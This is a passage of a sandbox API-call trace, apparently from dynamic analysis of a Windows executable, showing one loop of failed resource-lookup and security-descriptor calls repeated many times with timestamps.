[0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.068] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.068] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.068] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.068] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.068] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.069] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.069] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.069] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.069] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.069] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.069] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.069] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.069] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.069] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.069] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.069] LockResource (hResData=0x0) returned 0x0 [0070.069] FreeResource (hResData=0x0) returned 0 [0070.069] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.070] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.070] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.070] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.070] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.070] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.070] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.070] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.070] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.070] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.070] LockResource (hResData=0x0) returned 0x0 [0070.070] FreeResource (hResData=0x0) returned 0 [0070.070] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.070] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.070] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.071] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.071] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.071] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.071] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.071] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.071] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.071] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.071] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.071] LockResource (hResData=0x0) returned 0x0 [0070.071] FreeResource (hResData=0x0) returned 0 [0070.071] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.071] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.072] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.072] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.072] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.072] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.072] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.072] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.072] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.072] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.072] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.072] LockResource (hResData=0x0) returned 0x0 [0070.072] FreeResource (hResData=0x0) returned 0 [0070.072] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.072] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.072] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.072] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.073] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.073] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.073] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.073] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.073] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.073] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.073] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.073] LockResource (hResData=0x0) returned 0x0 [0070.073] FreeResource (hResData=0x0) returned 0 [0070.073] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.074] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.074] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.074] LockResource (hResData=0x0) returned 0x0 [0070.074] FreeResource (hResData=0x0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.074] LockResource (hResData=0x0) returned 0x0 [0070.074] FreeResource (hResData=0x0) returned 0 [0070.074] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.074] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.074] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.074] LockResource (hResData=0x0) returned 0x0 [0070.074] FreeResource 